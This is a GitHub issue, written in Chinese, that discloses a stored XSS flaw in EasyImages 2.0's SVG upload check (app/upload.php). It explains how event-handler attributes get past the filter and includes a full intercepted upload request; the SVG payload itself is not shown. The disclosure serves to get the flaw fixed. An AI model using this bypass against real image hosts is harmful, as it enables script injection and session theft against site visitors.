app/upload.php文件存在XSS漏洞 #260
Description
Describe the bug
在app/upload.php文件下第94行检测.svg图片内容的代码,正则表达式不够严格,只检测 <script>标签和href=属性,没有检测其他XSS向量。如下图所示:
可以使用使用事件处理器、onmouseover事件、onclick等事件绕过。下面以事件处理器为例。
Proof of vulnerability
1、访问前端地址http://easyimages2.0.com:84,点击选择文件,任意的.svg都行,比如传入xss.svg,用记事本打开编辑内容为111,上传的时候抓包,将111的内容改为下面的payload:
SVG XSS
2、最后通过返回的路径进行访问即可验证漏洞
完整payload演示:
POST /app/upload.php HTTP/1.1
Host: easyimages2.0.com:84
Content-Length: 652
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Edg/142.0.0.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAInb7EYA1l1aG22F
Accept: /
Origin: http://easyimages2.0.com:84
Referer: http://easyimages2.0.com:84/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zu;q=0.5
Cookie: Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1762869351; HMACCOUNT=E84C5FB68F8B5CBC; filemanager=s0uekupm8lehqapk7v5msu2sib; PHPSESSID=6e12mgfvc21aunj5i4buvi3lsk; Hm_lpvt_c790ac2bdc2f385757ecd0183206108d=1762871216
Connection: keep-alive
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="name"
xss.svg
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="uuid"
o_1j9pl4k1gjkge6ljmd51g9f0i
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="sign"
1762871215
------WebKitFormBoundaryAInb7EYA1l1aG22F
Content-Disposition: form-data; name="file"; filename="xss.svg"
Content-Type: image/svg+xml
结果图如下:
Expected behavior
A clear and concise description of what you expected to happen.
Screenshots
If applicable, add screenshots to help explain your problem.
Desktop (please complete the following information):
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
Smartphone (please complete the following information):
- Device: [e.g. iPhone6]
- OS: [e.g. iOS8.1]
- Browser [e.g. stock browser, safari]
- Version [e.g. 22]
Additional context
Add any other context about the problem here.